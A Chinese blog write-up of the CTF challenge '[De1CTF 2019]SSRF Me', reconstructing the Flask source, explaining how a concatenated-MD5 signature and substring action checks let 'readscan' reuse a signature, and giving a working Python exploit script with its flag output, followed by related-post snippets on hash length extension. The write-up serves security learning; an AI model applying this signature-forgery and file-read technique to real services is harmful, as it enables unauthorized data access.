BUUCTF-[De1CTF 2019]SSRF Me

最新推荐文章于 2025-12-09 16:47:37 发布
原创 最新推荐文章于 2025-12-09 16:47:37 发布 · 127 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #开发语言

部署运行你感兴趣的模型镜像

审计代码,用ai还原代码

#! /usr/bin/env python 
#encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json

# 设置默认编码为latin1
reload(sys)
sys.setdefaultencoding('latin1')

app = Flask(__name__)
# 生成一个16字节的随机密钥
secert_key = os.urandom(16)

class Task:
    def __init__(self, action, param, sign, ip):
        self.action = action  # 操作类型
        self.param = param    # 参数
        self.sign = sign      # 签名
        # 根据IP创建沙盒目录
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)):
            os.mkdir(self.sandbox)

    def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()):  # 检查签名
            if "scan" in self.action:  # 扫描操作
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:  # 读取操作
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result

    def checkSign(self):
        # 验证签名是否正确
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False

# 生成签名的接口
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

# 主接口
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    # 从cookie和参数中获取数据
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):  # WAF检查
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())

# 首页
@app.route('/')
def index():
    return open("code.txt","r").read()

# 扫描函数
def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]  # 读取URL内容的前50个字符
    except:
        return "Connection Timeout"

# 生成签名函数
def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

# MD5函数
def md5(content):
    return hashlib.md5(content).hexdigest()

# WAF函数,防止攻击
def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False

if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=80)

然后发现是检查sign,一个获取,一个注入,只要secert_key + param + action一样就行,而且key是不会变动。

于是一次查询,获取secert_key+flag.txtread+scan的md5,然后利用这个sgin,注入secert_key+flag.txt+readscan 主要利用了Exec(self)中的if in则可以同时执行两个条件,payload如下:

import requests
import hashlib
import socket

TARGET = "http://f9e47b13-e053-45b9-ae8e-b82c3939068c.node5.buuoj.cn:81/"


def exploit():


    # 第一步:获取flag.txtread的签名用于scan操作
    param = "flag.txtread"
    gene_sign_url = f"{TARGET}geneSign?param={param}"
    original_sign = requests.get(gene_sign_url).text.strip()
    print(f"[+] flag.txtread的签名: {original_sign}")

    cookies = {
        "action": "readscan",
        "sign": original_sign
    }
    params = {
        "param": "flag.txt"
    }

    response = requests.get(
        f"{TARGET}De1ta",
        params=params,
        cookies=cookies
    )
    
    print("\n[+] 操作响应:")
    print(response.text)


if __name__ == "__main__":
    exploit()

获取flag

{"msg": "Sign Error", "code": 500}
PS C:\Users\24785\Desktop\temp> python .\attack.py
[+] flag.txtread的签名: 85fc11543bfa8997cfe73cc492cc9fdc

[+] 操作响应:
{"code": 200, "data": "flag{2a8bdc8c-10d0-4f35-8872-1a47962e4701}\n"}

您可能感兴趣的与本文相关的镜像

Python3.9

Python3.9

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

臻荣
关注
BUUCTF:[De1CTF 2019]SSRF Me
末初 · mochu7
04-24 1455
https://buuoj.cn/challenges#[De1CTF%202019]SSRF%20Me 源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencodi
buuctf [De1CTF 2019]SSRF Me
qq_52671379的博客
04-19 1123
buuctf [De1CTF 2019]SSRF Me
[De1CTF 2019]SSRF Me1
m0_73673698的博客
07-24 667
既然/geneSign路由能够返回sign值并且sign值还是md5(secret_key+param+action)的值(因为在python中+代表字符串直接拼接)也就是md5(xxxflag.txtreadscan),又因为在geneSign这一路由中action是固定的等于scan,所以我们要想得到readscan的sign值那么我们可以令param=flag.txtread。通过sign传递然后令action=readscan,通过get方法去传递param=flag.txt,得到flag。
BUUCTF [De1CTF 2019]SSRF Me
CyhDl666的博客
03-09 344
审计一下源码,稍微加了一些注释 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert.
buuctf-[De1CTF 2019]SSRF Me
weixin_43345082的博客
12-30 1233
打开页面就是源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefault...
BUUCTF-[De1CTF 2019]SSRF Me1——python代码审计
2401_88083440的博客
02-28 721
原本还打算用从别的师傅那学来的方法——哈希拓展攻击的,但无奈在kali上下不下来,先放着。前面代码部分写得有些乱,还请见谅。
BUUCTF】[De1CTF 2019]SSRF Me1
2401_86760082的博客
01-23 1478
打开题目发现有提示,可以访问./flag.txt打开题目页面如下。
web buuctf [De1CTF 2019]SSRF Me
weixin_44214568的博客
04-03 1359
打开是一团代码, 整理后: ! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_k
SSRF类型的CTF题目[De1CTF 2019]SSRF Me1
weixin_73049307的博客
09-26 1181
第一个if要求传入的action中含有scan,然后调用scan函数从文件中查找param这个文件,将文件名给resp,然后通过tmpfile函数写入result.txt中,且令它连通。我们已知flag在flag.txt中,而且最终要通过/De1ta中的param来得到,所以/De1ta中的param=flag.txt。第二个if要求传入的action中含有read,然后从result.txt中查找连通的文件作为f,并让result['data']=f.read得到它的内容。
[BUUCTF][De1CTF 2019]SSRF Me
cosmoslin的博客
11-18 452
考点 读取文件的特殊方法 哈希扩展 解题 提示:flag is in ./flag.txt 直接给出源码,flask框架 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaulten
[De1ctf 2019]SSRF Me(哈希拓展攻击)
2301_76690905的博客
01-08 2115
在secret_key + param + action里,已知secert_key = os.urandom(16)(长度16),已知明文flag.txt(param)和scan(action),我们需要添加read。把flag.txt算进秘钥长度里,则秘钥长度为16+8,已知明文为scan,已知hash为8370a8f86a7a74b4053d1bc554a9d126,拓展明文为read,启动刚刚的脚本依次填入得到新明文和新hash,
[De1CTF 2019]SSRF Me 1
plant1234的博客
04-06 1695
[De1CTF 2019]SSRF Me 1 SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 打
BUUCTF:[De1CTF 2019]SSRF Me ------(代码审计&&哈希拓展长度攻击&&代码审计明白之后的另一种方法)
Zero_Adam的博客
02-15 622
目录:一、不足:二、注意事项三、看WP:1. 哈希拓展长度攻击2.字符串拼接 一、不足: 真·什么也不会。。 代码审计吧,,不会代码审计, 对python很不了解,,,刚看代码的时候,真的没有一句能够看懂的。。不行就以后看看少用burp,多用pyt脚本练练python看看, 代码审计拉得很,,, 二、注意事项 盐的长度,通常不会是题目所给的盐的长度,这点要注意。 三、看WP: 1. 哈希拓展长度攻击 啥啊这是,,是个python的flask。但是怎么看啊这,,, #! /usr/bin/env
50、【Ubuntu】【Gitlab】拉出内网 Web 服务:http.server 单/多线程分析(二)
HIT_Weston的博客
12-04 1448
本文分析了Python的http.server模块在单线程和多线程模式下的性能表现。通过测试发现,单线程模式下(Python<3.7)并发请求会被阻塞,后发请求需要等待前一个请求完成;而多线程模式下(Python≥3.7)可以同时处理多个请求。作者通过slow_server.py脚本模拟耗时操作,使用time curl命令测试响应时间,验证了线程模型的差异。文章还指出Python 3.7是一个重要分水岭,官方将默认命令行服务器升级为多线程以提升用户体验。技术细节参考了CPython源码,并提供了Git
深度学习下载包时可能会遇到的问题及解决方案
最新发布
m0_50481455的博客
12-09 277
若确实下载安装了CUDA ,但是此时输出的CUDA是否可用为否,应该是torch的版本为cpu版本导致,刚刚的下载包的语句如果总是下载的是cpu版本,我们考虑直接去网站下指定包,再进行安装。CUDA Version表示的是驱动支持的最高 CUDA 版本,去官网下载 CUDA ,我这里是12.2,表示下载的版本最大只能是12.2。然后下载包时,比如本地环境是Python3.9,找包下载时候,3.9要下对应cp39的包。下载好后,执行语句安装。
推荐 | JoyAgent-JDGenie:开箱即用的端到端多智能体产品
lpfasd123的博客
12-05 369
如果你在寻找一款真正可落地的多智能体产品,用来“搜索-分析-生成报告”、“数据问答与诊断”、“代码解释与图表生成”,同时希望易部署、易扩展、易二次开发——JoyAgent-JDGenie 是非常值得试用与推荐的选择。只需填好少量配置,即可获得端到端的流式体验与交付能力。
Python 海象运算符
这是一个c++热爱者的博客哟
12-08 601
Python 3.8引入的海象运算符(:=)允许在表达式中进行变量赋值,能有效减少重复代码。它特别适用于循环条件、列表推导式等场景,如while (line := file.readline()):可简化文件读取操作。使用时需注意:必须加括号,避免在复杂表达式中过度使用以免降低可读性。虽然该特性能精简代码,但应遵循团队约定,在保持代码清晰的前提下合理使用。
零基础学JAVA--Day41(IO文件流+IO流原理+InputStream+OutputStream)
Dxxyyyy的博客
12-05 992
文件在程序中是以流的形式来操作的流:数据在数据源(文件)和程序(内存)之间经历的路径输入流:数据从数据源(文件)到程序(内存)的路径输出流:数据从程序(内存)到数据源(文件)的路径。
第30篇:逆袭量化路:用 bot_start 和 bot_loop_start 玩转 Freqtrade 策略
qq_36936892的博客
12-06 288
Freqtrade策略开发中,bot_start()和bot_loop_start()是两个关键生命周期函数。bot_start()在机器人启动时仅调用一次,适合初始化数据、加载资源等操作;bot_loop_start()在每个交易循环开始时触发,可用于状态刷新、动态参数调整等周期性任务。开发者应注意前者只需快速执行,后者需保持轻量以避免阻塞。合理使用这两个函数能增强策略灵活性,支持复杂交易逻辑实现。掌握这两个回调函数是提升Freqtrade策略开发效率的重要环节。
[de1ctf 2019]ssrf me 1
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值